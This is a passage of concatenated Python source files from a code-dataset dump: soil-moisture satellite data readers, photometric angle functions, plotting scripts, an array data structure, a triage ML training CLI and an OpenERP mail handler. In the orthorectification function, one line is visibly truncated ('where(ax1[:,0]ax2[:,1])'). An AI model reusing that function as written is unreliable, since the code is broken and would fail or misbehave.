print(\"复制并粘贴今日未上报的通知信息,然后在末尾换行输入‘ok’\\n\")\n stopword = 'ok'\n context = ''\n for line in iter(input, stopword):\n context += line + '\\n'\n context = context.strip()\n return context\n\n\ndef parser():\n text = inputer()\n text = text.split(\"单位\")[-1].strip()\n return text\n","sub_path":"name_parser.py","file_name":"name_parser.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252139015","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n__version__=\"1.0.0\"\n\n__doc__='''\n ############################ ILLUMINATION ANGLES FUNCTIONS ##############################\n ### Filename: angles.py\n ### Author: Pedro H. A. Hasselmann\n ###\n ### Compute the illumination angles from incidence, emergence, phase and azimuth angles.\n ### Spherical coordinates and local solar time are included.\n ###\n #########################################################################################\n'''\n### FUNCTIONS ####\n\ndef phase(i, e, phi):\n ''' Phase Angle.\n \n Parameters\n ==========\n i: incidence, e: emergence, phi: azimuth \n '''\n from numpy import sign, arccos, cos, sin\n return sign(e)*arccos( cos(i)*cos(e) + sin(i)*sin(e)*cos(phi) )\n\n\ndef azimuth(i, e, phase):\n ''' Azimuth.\n \n Parameters\n ==========\n i: incidence, e: emergence, phase: phase angle \n '''\n from numpy import cos, arccos, sin\n return arccos( (cos(phase) -cos(i)*cos(e))/(sin(i)*sin(e)) )\n\n\ndef cos_illum_lat(i, e, phi):\n ''' \n Luminance Latitude.\n \n Parameters\n ==========\n i: incidence, e: emergence, phi: azimuth\n '''\n from numpy import cos, arccos, sin, tan, sqrt \n sin2e_sin2i = sin(2e0*e) * sin(2e0*i)\n sinie2 = ( sin(i + e) )**2\n cosphi2 = ( cos(phi/2e0) )**2\n \n term1 = sinie2 -cosphi2*sin2e_sin2i\n \n return sqrt( term1/(term1 + ( sin(i)*sin(e)*sin(phi) )**2 ) )\n\n\ndef cos_illum_lon(e, coslat):\n ''' \n Luminance Longitude. \n '''\n from numpy import cos\n # Change sign if not contained by the photometric equator\n #sign = ones(ph.shape)\n #boolean = (ph < meridian_phase).values\n #sign[boolean] = -1e0\n #if isnan(meridian_phase): sign = -1e0 \n return cos(e)/coslat#*sign\n\n\ndef spherical_coord(X, Y, Z):\n ''' \n Spherical coordinates: latitude, longitude, radius\n \n Paramters\n =========\n X, Y, Z \n\n https://stackoverflow.com/questions/4116658/faster-numpy-cartesian-to-spherical-coordinate-conversion\n '''\n from numpy import degrees, sqrt, arctan2, arccos\n xy = X**2 + Y**2\n r = sqrt(xy + Z**2)\n lon = arctan2(Y, X)\n lat = arctan2(Z, sqrt(xy))\n return lat, lon, r\n\n\ndef orthorectification(l, alt0, alt1, res, c=(1014,1014)):\n '''\n Orthorectification.\n Correct a length l by distortion caused by viewing angle and distance.\n \n l : array of (X0,Y0,X1,Y1)\n alt0, alt1 : altitude in respect to points (X0, Y0) and (X1, Y1)\n res : pixel angular resolution (x_res, y_res)\n c : central reference (generally the middle of the image)\n '''\n from numpy import array, int32, sqrt, cos, sin, fabs, zeros, where\n\n ax1 = res[0]*(l[:,[0,2]]-c[0]) # X-column image\n ax2 = res[1]*(l[:,[1,3]]-c[1]) # Y-column image\n ax11, ax22 = ax1.copy(), ax2.copy()\n\n # Re-order the vectors\n # azimuth vector length must be larger than theta vector length\n c = where(ax1[:,0]ax2[:,1])\n ax22[:,0][c]=ax2[:,1][c]\n ax22[:,1][c]=ax2[:,0][c]\n az, theta = ax11.copy(), ax22.copy()\n \n c=fabs(az[:,0]-az[:,1])>fabs(theta[:,0]-theta[:,1])\n az[c,:]=ax22[c,:]\n theta[c,:]=ax11[c,:] \n \n # Orthorectified length\n r2 = alt0**2 +alt1**2 -2e0*alt0*alt1*(sin(theta[:,0])*sin(theta[:,1])*cos(az[:,0]-az[:,1]) +cos(theta[:,0])*cos(theta[:,1]))\n\n return sqrt(r2), theta, az\n\n\ndef solid_angle_tri(v1_v2, d):\n '''\n Compute projected triangular Solid Angle.\n Unit: stereoradians.\n\n Parameters\n ==========\n v1_v2 : 2D frame-projected coordinates.\n d : 1D observer distance at facet center.\n '''\n from numpy import float32, sum, sqrt\n \n s1 = sqrt(sum((v1_v2[:,0,:]-v1_v2[:,1,:])**2, axis=1))\n s2 = sqrt(sum((v1_v2[:,0,:]-v1_v2[:,2,:])**2, axis=1))\n s3 = sqrt(sum((v1_v2[:,1,:]-v1_v2[:,2,:])**2, axis=1))\n\n p = (s1+s2+s3)/2e0\n\n omega = sqrt(p*(p-s1)*(p-s2)*(p-s3))/(d**2)\n return omega.astype(float32)\n\n\n# END\n","sub_path":"support/angles.py","file_name":"angles.py","file_ext":"py","file_size_in_byte":3959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394892339","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom numpy.linalg import slogdet as slogdet\nimport numpy as np\nimport os\nimport glob\n\nplt.style.use('ggplot')\n\ndfs = []\nos.chdir('resTARS')\ncols = [\"theta.1\",\"theta.2\",\"eta.1\",\"eta.2\",\"sigma\"]\nrealmeans = [0.25,0.3,2,3,0.01]\npriormeans = [0.5,0.5,2.5,2.5]\npriorstd = [np.sqrt(3)/6]*2+[np.sqrt(3)/2]*2+[np.sqrt(3)/6]\nfor nexp in os.listdir():\n os.chdir(nexp)\n for sampfile in glob.glob('*_*.csv'):\n tmpdf = pd.read_csv(sampfile,sep=',',comment='#',usecols=cols)\n tmpdf['nexp'] = int(nexp)\n [i1,i2,isigma] = sampfile[:-4].split('_')\n tmpdf['i1'] = float(i1)\n tmpdf['i2'] = float(i2)\n dfs.append(tmpdf)\n os.chdir('..')\nos.chdir('..')\n\n\ndf = pd.concat(dfs,ignore_index=True)\n\n#print(df)\n\ndf['IC'] = [\"{:.2f}\\n{:.2f}\".format(x,y) for (x,y) in zip(df.i1,df.i2)]\n\ngrps = df.groupby(['IC','nexp'])[cols]\ngmeans = grps.mean()\ngstds = grps.std()\ngscore = grps.apply(lambda g: -1/2*slogdet(g.cov())[1])\ngscore.name='score'\ngmeans = pd.concat([gmeans,gscore],axis=1)\ngmeans.reset_index(inplace=True)\ngstds.reset_index(inplace=True)\ngmeans['meanscore'] = gmeans.groupby(['IC'])['score'].transform('mean')\ngstds['meanscore'] = gmeans['meanscore']\ngmeans.sort_values(by='meanscore',ascending=False,inplace=True)\ngstds.sort_values(by='meanscore',ascending=False,inplace=True)\nplt.title('Means of different posterior distributions for each parameter')\n\nhlcol=\"#888888\"\nfor (i,y) in enumerate(cols[:4]):\n plt.subplot(510+i+2)\n plt.title(y)\n axm = sns.stripplot(data=gmeans,y=y,x='IC',jitter=True,alpha=0.5,zorder=1000)\n plt.setp(axm,ylabel=\"Mean\")\n plt.axhline(realmeans[i],color=hlcol,linewidth=1)\n plt.axhline(priormeans[i],linestyle='-.',color=hlcol,linewidth=1)\n plt.twinx()\n axs = sns.pointplot(data=gstds,y=y,x='IC',color='#606060',join=False,markers='x',ci='sd')\n plt.setp(axs,ylabel=\"Std\")\n if i < 3:\n plt.setp(axs,xticklabels=[])\n plt.setp(axm,xlabel=\"\")\n else:\n plt.setp(axm,xlabel=\"Initial Conditions\")\n axs.grid(None)\n plt.axhline(priorstd[i],linestyle=':',color=hlcol,linewidth=1)\n #pp =sns.pointplot(data=gmeans,x='IC',capsize=0.25,y=y,join=False)\n #pp.set(xlabel='Initial conditions')\n\nplt.subplot(511)\nvp = sns.violinplot(data=gmeans,x='IC',y='score',cut=0,inner=None)\nvs = sns.pointplot(data=gmeans,x='IC',y='score',color='#505050',join=False,ci='sd')\nplt.setp(vs,xticklabels=[],xlabel=\"\")\nplt.title(\"Score\")\n\nplt.show()\n","sub_path":"Exp2/mean_analyzer.py","file_name":"mean_analyzer.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179452259","text":"import ctypes\n\n\nclass Array:\n\n def __init__(self, size):\n \"\"\"\n Creates the array with specific size using the ctypes module.\n \"\"\"\n self._size = size\n PyArrayType = ctypes.py_object * size\n self._elements = PyArrayType()\n self.set_values(None)\n\n def __len__(self):\n \"\"\"\n Returns the length of the array.\n :return: int\n \"\"\"\n return self._size\n\n def set_values(self, value):\n \"\"\"\n Sets specific value to all the elements in the array.\n :param value: value\n :return: None\n \"\"\"\n for i in range(len(self)):\n self._elements[i] = value\n\n def __getitem__(self, index):\n \"\"\"\n Gets the contents of the index element.\n :param index: int\n :return: content of the element.\n \"\"\"\n assert 0 <= index < len(self), \"Array subscript out of range\"\n return self._elements[index]\n\n def __setitem__(self, index, value):\n \"\"\"\n Puts the value in the array element at index position.\n :param value: value\n :return: None\n \"\"\"\n assert 0 <= index < len(self), \"Array subscript out of range\"\n self._elements[index] = value\n\n # Returns the array's iterator for traversing the elements.\n def __iter__(self):\n return _ArrayIterator(self._elements)\n\n def __str__(self):\n \"\"\"\n Array representation.\n :return: str\n \"\"\"\n res = '['\n for el in self._elements:\n res += str(el) + ', '\n res = res[:-2] + ']'\n return res\n\n# An iterator for the Array ADT.\n\n\nclass _ArrayIterator:\n def __init__(self, the_array):\n self._array_ref = the_array\n self._cur_index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self._cur_index < len(self._array_ref):\n entry = self._array_ref[self._cur_index]\n self._cur_index += 1\n return entry\n else:\n raise StopIteration\n\n\nclass Array2D:\n \"\"\"\n Creates a 2-D array of size numRows x numCols.\n \"\"\"\n\n def __init__(self, num_rows, num_cols):\n \"\"\"\n Creates the 2-D array of the specific size: num_rows and num_cols.\n \"\"\"\n self.rows = Array(num_rows)\n for i in range(num_rows):\n self.rows[i] = Array(num_cols)\n\n def num_rows(self):\n \"\"\"\n Returns the number of rows in the 2-D array.\n :return: int\n \"\"\"\n return len(self.rows)\n\n def num_cols(self):\n \"\"\"\n Returns the number of columns in the 2-D array.\n :return: int\n \"\"\"\n return len(self.rows[0])\n\n def set_value(self, value):\n \"\"\"\n Sets specific value to all the elements in the array.\n :return: None\n \"\"\"\n for row in self.rows:\n row.set_values(value)\n\n def __getitem__(self, index_tuple):\n \"\"\"\n Gets the contents of the element at position [i, j].\n :param index_tuple: tuple\n :return: content of the element.\n \"\"\"\n assert len(index_tuple) == 2, \"Invalid number of array subscripts.\"\n row, col = index_tuple\n assert 0 <= row < self.num_rows() and 0 <= col < self.num_cols(), \\\n \"Array subscript out of range.\"\n array_1d = self.rows[row]\n return array_1d[col]\n\n def __setitem__(self, index_tuple, value):\n \"\"\"\n Sets the contents of the element at position [i,j] to value.\n :param index_tuple: tuple\n :param value: value\n :return: None\n \"\"\"\n assert len(index_tuple) == 2, \"Invalid number of array subscripts.\"\n row, col = index_tuple\n assert 0 <= row < self.num_rows() and 0 <= col < self.num_cols(), \\\n \"Array subscript out of range.\"\n array_1d = self.rows[row]\n array_1d[col] = value\n\n def __str__(self):\n res = '[\\n'\n for row in array2.rows:\n res += str(row) + '\\n'\n return res + ']'\n\n\nif __name__ == '__main__':\n # Testing Array\n array1 = Array(10)\n # print(array1)\n assert array1.__len__() == 10\n array1.set_values(95)\n # print(array1)\n for index in range(10):\n assert array1.__getitem__(index) == 95\n array1.__setitem__(3, 51)\n # print(array1)\n assert array1.__getitem__(3) == 51\n\n # Testing Array 2D\n array2 = Array2D(5, 4)\n assert array2.num_rows() == 5\n assert array2.num_cols() == 4\n # print(array2)\n array2.set_value(95)\n # print(array2)\n assert array2.__getitem__((3, 3)) == 95\n array2.__setitem__((2, 2), 20)\n # print(array2)\n assert array2.__getitem__((2, 2)) == 20","sub_path":"mass-media/ADT/ADT.py","file_name":"ADT.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358510723","text":"\nimport numpy as np\nimport pandas as pd\n\nfrom pathlib import Path\nfrom collections import OrderedDict\n\nfrom netCDF4 import Dataset, num2date, date2num\n\nfrom myprojects.io.grids import EASE2\nfrom myprojects.io.netcdf import ncfile_init\n\nimport h5py\n\nclass SMAP_io(object):\n\n def __init__(self):\n self.path = Path(r\"D:\\data_sets\\SMAP\\SPL2SMP.008\\reformated\")\n self.ds_ts = Dataset(r\"D:\\data_sets\\SMAP\\SPL2SMP.008\\reformated\\timeseries.nc\")\n\n grid = EASE2('M36')\n self.lats = grid.ease_lats\n self.lons = grid.ease_lons\n\n def latlon2gpi(self, lat, lon):\n return np.argmin((self.lons - lon)**2 + (self.lats - lat)**2)\n\n def read(self, lat, lon, qc=True, rowcol=False):\n\n if rowcol:\n row, col = lat, lon\n else:\n row = np.argmin(np.abs(self.lats-lat))\n col = np.argmin(np.abs(self.lons-lon))\n\n dt = self.ds_ts['dt'][:, row, col]\n dt[dt.mask] = np.nan\n\n dates = self.ds_ts['time'][:]\n dates[~np.isnan(dt)] += dt[~np.isnan(dt)]\n smap_ts = pd.DataFrame(index=pd.DatetimeIndex(num2date(dates, self.ds_ts['time'].units,\n only_use_python_datetimes=True, only_use_cftime_datetimes=False)))\n\n variables = ['soil_moisture', 'soil_moisture_error',\n 'retrieval_qual_flag', 'surface_flag',\n 'vegetation_opacity', 'vegetation_water_content',\n 'landcover_class', 'landcover_class_fraction']\n for var in variables:\n smap_ts[var] = self.ds_ts[var][:, row, col]\n\n smap_ts = smap_ts[~np.isnan(dt.data)]\n\n if qc:\n smap_ts = smap_ts[(smap_ts['surface_flag'] == 1024) | \\\n (smap_ts['retrieval_qual_flag'] == 0) | \\\n (smap_ts['retrieval_qual_flag'] == 8)]\n\n # if len(smap_ts) == 0:\n # print(f'No valid SMAP data for {lat:.2f} / {lon:.2f}')\n # smap_ts = None\n\n return smap_ts[~np.isnan(smap_ts['soil_moisture'])]\n\n def close(self):\n self.ds_ts.close()\n\n\ndef remove_corrupt_h5_files_l3():\n\n root = Path(r'D:\\data_sets\\SMAP\\SPL3SMP.008\\raw')\n paths = sorted(root.glob('*'))\n for path in paths:\n files = sorted(path.glob('*.h5'))\n if len(files) == 0:\n print(f'No files in {path.name}')\n path.unlink()\n elif len(files) > 1:\n for f in files[:-1]:\n trg = path.parents[1] / 'corrupt' / path.name\n if not trg.exists():\n Path.mkdir(trg, parents=True)\n f.rename(path.parents[1] / 'corrupt' / path.name / f.name)\n else:\n continue\n\ndef create_L2_image_stack():\n\n root = Path(r\"D:\\data_sets\\SMAP\\SPL2SMP.008\\raw\")\n fout = root.parent / 'reformated' / 'images.nc'\n if not fout.parent.exists():\n Path.mkdir(fout.parent, parents=True)\n\n files = sorted(root.glob('**/*.h5'))\n t0s = pd.to_datetime([f.name[-29:-14] for f in files]).values\n u, i, c = np.unique(t0s, return_index=True, return_counts=True)\n t0s[i[c > 1]] += pd.Timedelta('1s') # sometimes Asc. and Dsc. files have same time stamp.\n dates = pd.Series(index=t0s).resample('12h').nearest().index\n\n grid = EASE2(gtype='M36')\n lats = grid.ease_lats\n lons = grid.ease_lons\n\n variables = ['dt',\n 'soil_moisture', 'soil_moisture_error',\n 'retrieval_qual_flag', 'surface_flag',\n 'vegetation_opacity', 'vegetation_water_content',\n 'landcover_class', 'landcover_class_fraction']\n\n dimensions = OrderedDict([('time', dates), ('lat', lats), ('lon', lons)])\n with ncfile_init(fout, dimensions, variables) as ds:\n\n for i, (f, t0) in enumerate(zip(files,t0s)):\n print(f'{i} / {len(files)}')\n dts = t0 - dates\n t = np.argmin(np.abs(dts))\n with h5py.File(f, mode='r') as arr:\n rows = arr[f'Soil_Moisture_Retrieval_Data']['EASE_row_index'][:].astype('int')\n cols = arr[f'Soil_Moisture_Retrieval_Data']['EASE_column_index'][:].astype('int')\n for var in variables:\n tmp_data = ds[var][t, :, :]\n if var == 'dt':\n tmp_data[rows, cols] = dts[t].total_seconds() / 3600 / 24\n ds[var][t, :, :] = tmp_data\n elif 'landcover' in var:\n tmp_data[rows, cols] = arr[f'Soil_Moisture_Retrieval_Data'][var][:, 0]\n ds[var][t, :, :] = tmp_data\n else:\n tmp_data[rows, cols] = arr[f'Soil_Moisture_Retrieval_Data'][var][:]\n ds[var][t, :, :] = tmp_data\n\n\ndef create_L3_image_stack():\n\n root = Path(r\"D:\\data_sets\\SMAP\\SPL3SMP.008\\raw\")\n fout = root.parent / 'reformated' / 'images.nc'\n\n files = sorted(root.glob('**/*.h5'))\n dates = pd.to_datetime([f.parent.name for f in files])\n\n grid = EASE2(gtype='M36')\n lats = grid.ease_lats\n lons = grid.ease_lons\n\n variables = ['retrieval_qual_flag', 'surface_flag',\n 'vegetation_opacity', 'vegetation_water_content',\n 'landcover_class', 'landcover_class_fraction',\n 'soil_moisture', 'soil_moisture_error']\n\n file_vars = [f'{var}_{orbit}' for var in variables for orbit in ['am', 'pm']] + \\\n ['soil_moisture','vegetation_opacity','vegetation_water_content','landcover_class', 'landcover_class_fraction']\n dimensions = OrderedDict([('time', dates), ('lat', lats), ('lon', lons)])\n with ncfile_init(fout, dimensions, file_vars) as ds:\n\n for t, f in enumerate(files):\n print(f'{t} / {len(files)}')\n\n with h5py.File(f, mode='r') as arr:\n for orbit in ['AM','PM']:\n ext = '_pm' if orbit == 'PM' else ''\n for var in variables:\n if 'landcover' in var:\n ds[f'{var}_{orbit.lower()}'][t, :, :] = arr[f'Soil_Moisture_Retrieval_Data_{orbit}'][f'{var}{ext}'][:, :, 0]\n else:\n ds[f'{var}_{orbit.lower()}'][t, :, :] = arr[f'Soil_Moisture_Retrieval_Data_{orbit}'][f'{var}{ext}'][:, :]\n\n mask_am = (arr[f'Soil_Moisture_Retrieval_Data_AM'][f'surface_flag'][:, :] != 1024) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_AM'][f'retrieval_qual_flag'][:, :] != 0) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_AM'][f'retrieval_qual_flag'][:, :] != 8)\n mask_pm = (arr[f'Soil_Moisture_Retrieval_Data_PM'][f'surface_flag_pm'][:, :] != 1024) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_PM'][f'retrieval_qual_flag_pm'][:, :] != 0) & \\\n (arr[f'Soil_Moisture_Retrieval_Data_PM'][f'retrieval_qual_flag_pm'][:, :] != 8)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'soil_moisture'][:, :]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'soil_moisture_pm'][:, :]\n tmp_am[mask_am] = np.nan\n tmp_pm[mask_pm] = np.nan\n tmp_am[tmp_am == -9999.] = np.nan\n tmp_pm[tmp_pm == -9999.] = np.nan\n ds['soil_moisture'][t, :, :] = np.nanmean([tmp_am, tmp_pm],axis=0)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'vegetation_opacity'][:, :]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'vegetation_opacity_pm'][:, :]\n tmp_am[mask_am] = np.nan\n tmp_pm[mask_pm] = np.nan\n tmp_am[tmp_am == -9999.] = np.nan\n tmp_pm[tmp_pm == -9999.] = np.nan\n ds['vegetation_opacity'][t, :, :] = np.nanmean([tmp_am, tmp_pm],axis=0)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'vegetation_water_content'][:, :]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'vegetation_water_content_pm'][:, :]\n tmp_am[mask_am] = np.nan\n tmp_pm[mask_pm] = np.nan\n tmp_am[tmp_am == -9999.] = np.nan\n tmp_pm[tmp_pm == -9999.] = np.nan\n ds['vegetation_water_content'][t, :, :] = np.nanmean([tmp_am, tmp_pm],axis=0)\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'landcover_class'][:, :, 0]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'landcover_class_pm'][:, :, 0]\n tmp_am[mask_am] = 254\n tmp_pm[mask_pm] = 254\n tmp_data = np.full(tmp_am.shape, 254)\n tmp_data[(tmp_am != 254) & (tmp_pm == 254)] = tmp_am[(tmp_am != 254) & (tmp_pm == 254)]\n tmp_data[(tmp_am == 254) & (tmp_pm != 254)] = tmp_pm[(tmp_am == 254) & (tmp_pm != 254)]\n tmp_data[(tmp_am != 254) & (tmp_pm != 254)] = tmp_am[(tmp_am != 254) & (tmp_pm != 254)]\n ds['landcover_class'][t, :, :] = tmp_data\n\n tmp_am = arr[f'Soil_Moisture_Retrieval_Data_AM'][f'landcover_class_fraction'][:, :, 0]\n tmp_pm = arr[f'Soil_Moisture_Retrieval_Data_PM'][f'landcover_class_fraction_pm'][:, :, 0]\n tmp_am[mask_am] = 254\n tmp_pm[mask_pm] = 254\n tmp_data = np.full(tmp_am.shape, 254)\n tmp_data[(tmp_am != 254) & (tmp_pm == 254)] = tmp_am[(tmp_am != 254) & (tmp_pm == 254)]\n tmp_data[(tmp_am == 254) & (tmp_pm != 254)] = tmp_pm[(tmp_am == 254) & (tmp_pm != 254)]\n tmp_data[(tmp_am != 254) & (tmp_pm != 254)] = tmp_am[(tmp_am != 254) & (tmp_pm != 254)]\n ds['landcover_class_fraction'][t, :, :] = tmp_data\n\n\nif __name__=='__main__':\n # create_L2_image_stack()\n # create_L3_image_stack()\n # remove_corrupt_h5_files_l2()\n\n pass\n\n# ncks -4 -L 4 --cnk_dmn time,10000 --cnk_dmn lat,1 --cnk_dmn lon,1 images.nc timeseries.nc\n\n","sub_path":"io/smap.py","file_name":"smap.py","file_ext":"py","file_size_in_byte":10180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"325657461","text":"import pandas as pd\r\nimport os\r\nimport psutil\r\nimport time\r\nimport logging\r\n\r\nsettings = {\r\n 'newfile': False,\r\n 'testing': True\r\n}\r\n\r\n\r\ndef main():\r\n logging.basicConfig(level=('DEBUG' if settings['testing'] else 'WARNING'))\r\n start = time.time()\r\n process = psutil.Process(os.getpid())\r\n logging.debug('Baseline memory in use: {}MB'.format(round(process.memory_info().rss / 1024.0 / 1024, 2)))\r\n\r\n df = None\r\n\r\n # new file. convert from Excel to CSV, then extract the description columns.\r\n if settings['newfile']:\r\n convert_to_csv()\r\n extract_text()\r\n else:\r\n # I chose not to do these operations when we have a new file, instead running it seperately. WHen importing\r\n # from CSV, memory usage is significantly less.\r\n df = pd.read_csv('WO_single.csv', encoding='utf-8')\r\n\r\n # print column non-NaN count\r\n logging.info('Number of completed values per column:\\n{}'.format(df.count()))\r\n\r\n finish = time.time()\r\n logging.debug('Operations completed. Memory in use: {}MB'.format(round(process.memory_info().rss / 1024.0 / 1024, 2)))\r\n logging.info('Elapsed time: {} seconds'.format(round(finish - start, 2)))\r\n\r\n\r\ndef convert_to_csv():\r\n df = pd.read_excel('WO_single.xlsx')\r\n df.rename(columns={0: \"ID\"}) # This doesn't seem to work. Haven't found a single method so far to rename a column.\r\n df.to_csv('WO_single.csv', encoding='UTF-8')\r\n\r\n\r\ndef extract_text():\r\n df = pd.read_csv('WO_single.csv', encoding='utf-8')\r\n dfe = df[['description', 'description1']]\r\n dfe.to_csv('WO_language.csv', encoding='utf-8')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606944337","text":"from CloudCompute_Py.Vectors import *\norigin = Vector(0, 0, 0)\np1 = Vector(2, 3, 5, 5, 6)\np2 = Vector(1, -1, -2)\n#Adds vectors\np1 + p2\n#Subtracts vectors\np1 - p2\n#Same as subtracting\np1 + -p2\n#Returns p1 set to the length of p2\np1 & p2\n#Sets p1's length to p2\np1 &= p2\n#Shifts all elements of p1 to the left 2, and other values are now 0\np1 << 2\n#returns the length of the vector of p1\n~p1\n#returns the magnitude of p1\np1 % 0\n#returns the distance between p1 and p2\np1 % p2\n#returns p1 divided by 2\np1 / 2\n#returns p1 muliplied by 2\np1 * 2\n#Returns pointwise multiplication of p1 and p2\np1 * p2\n\nfrom CloudCompute_Py.Complex import *\na = Complex(arg=math.pi, rad=2)\nb = Complex(-2, 3)\n\nprint(a)\n\n\n\n\n","sub_path":"python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"188301109","text":"from triage_ml import train_radius_variance\nfrom triage_ml.data.dataset import DataSet\nfrom triage_ml.triage_api import TriageAPI\nfrom triage_ml.data.visualizations import visualize_training_results\n\nimport sys\nfrom typing import Text\nfrom datetime import datetime\nimport os\nimport argparse\nimport requests\n\n\nTRIAGE_API_URL = os.getenv('TRIAGE_API_URL')\nTRIAGE_API_USER = os.getenv('TRIAGE_API_USER')\nTRIAGE_API_PASS = os.getenv('TRIAGE_API_PASS')\n\nDATE_FORMAT = '%Y-%m-%d'\n\nMODELS = {\n 'radius_variance': train_radius_variance\n}\n\n\ndef _load_dataset_from_file(file_name: Text) -> DataSet:\n data = []\n with open(file_name) as f:\n for line in f.readlines():\n line = line.rstrip().split(',')\n data.append((\n int(line[0]),\n int(line[1]),\n datetime.strptime(line[2], '%Y-%m-%d'),\n ))\n\n return DataSet(data)\n\n\ndef parse_args(args):\n \"\"\"\n Parser configuration\n :return: parsed augments object\n \"\"\"\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-m', '--model', required=True, choices=MODELS.keys(),\n help='The name of the model to train.')\n parser.add_argument('-c', '--clinic_id', required=True, type=int,\n help='The ID of the clinic whose data to use for training.')\n parser.add_argument('-s', '--severity', required=True, type=int,\n help='The triage severity level to train on.')\n parser.add_argument('-e', '--epochs', default=100, type=int,\n help='Number of passes through the dataset to train for.')\n parser.add_argument('-lr', '--learning_rate', default=0.001, type=float,\n help='The gradient descent learning rate.'),\n parser.add_argument('-p', '--persist', default=False, type=bool,\n help='Whether training weights should be persisted to database.')\n parser.add_argument('-w', '--weights', default='weights.h5', type=str,\n help='The path to write training weights to.')\n parser.add_argument('-r', '--results', default='results.png', type=str,\n help='The path to write the results graph to.')\n\n # If pulling data from API\n parser.add_argument('-sd', '--start_date', help=f'The start date of the data. Format: {DATE_FORMAT}')\n parser.add_argument('-ed', '--end_date', help=f'The end date of the data. Format: {DATE_FORMAT}')\n\n # If using local data\n parser.add_argument('-d', '--dataset',\n help='An optional local dataset to train on instead')\n\n return parser.parse_args(args)\n\n\ndef main(http=requests, str_args=None):\n \"\"\"\n Entrypoint for triage-train.\n \"\"\"\n args = parse_args(str_args or sys.argv[1:])\n triage_api = TriageAPI(TRIAGE_API_URL, TRIAGE_API_USER, TRIAGE_API_PASS, http)\n\n if args.dataset:\n dataset = _load_dataset_from_file(args.dataset)\n else:\n start_date = datetime.strptime(args.start_date, DATE_FORMAT)\n end_date = datetime.strptime(args.end_date, DATE_FORMAT)\n dataset = triage_api.get_data(args.clinic_id, args.severity, start_date, end_date)\n\n dataset.filter_on('clinic_id', lambda c_id: c_id == args.clinic_id)\n dataset.filter_on('severity', lambda s: s == args.severity)\n trained_model, train_data, test_data, history = train_radius_variance(dataset,\n epochs=args.epochs,\n lr=args.learning_rate,\n output_file=args.weights)\n\n if args.persist:\n triage_api.post_weights(args.clinic_id, args.severity, args.weights, history.history['val_loss'][-1])\n\n visualize_training_results(trained_model, train_data, test_data, args.results)\n","sub_path":"ml-training/triage_ml/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"435993429","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n\nfrom osv import fields,osv\nfrom tools.translate import _\nimport binascii\n\nclass project_tasks(osv.osv):\n _name = \"project.task\"\n _inherit = ['mailgate.thread','project.task']\n \n _columns={\n 'message_ids': fields.one2many('mailgate.message', 'res_id', 'Messages', domain=[('model','=',_name)], readonly=True),\n }\n def message_new(self, cr, uid, msg, context=None):\n# \"\"\"\n# Automatically calls when new email message arrives\n#\n# @param self: The object pointer\n# @param cr: the current row, from the database cursor,\n# @param uid: the current user’s ID for security checks\n# \"\"\"\n mailgate_obj = self.pool.get('email.server.tools')\n subject = msg.get('subject')\n body = msg.get('body')\n msg_from = msg.get('from')\n priority = msg.get('priority')\n\n data = { \n 'name': subject,\n 'description': body,\n 'planned_hours' : 0.0,\n }\n res = mailgate_obj.get_partner(cr, uid, msg_from)\n if res:\n data.update(res)\n res = self.create(cr, uid, data) \n \n attachments = msg.get('attachments', [])\n att_ids = []\n for attachment in attachments or []:\n data_attach = {\n 'name': attachment,\n 'datas':binascii.b2a_base64(str(attachments.get(attachment))),\n 'datas_fname': attachment,\n 'description': 'Mail attachment',\n 'res_model': self._name,\n 'res_id': res,\n }\n att_ids.append(self.pool.get('ir.attachment').create(cr, uid, data_attach))\n\n return res,att_ids \n \n def message_update(self, cr, uid, id, msg, data={}, default_act='pending'): \n mailgate_obj = self.pool.get('email.server.tools')\n msg_actions, body_data = mailgate_obj.msg_act_get(msg) \n data.update({\n 'description': body_data, \n })\n act = 'do_'+default_act\n if 'state' in 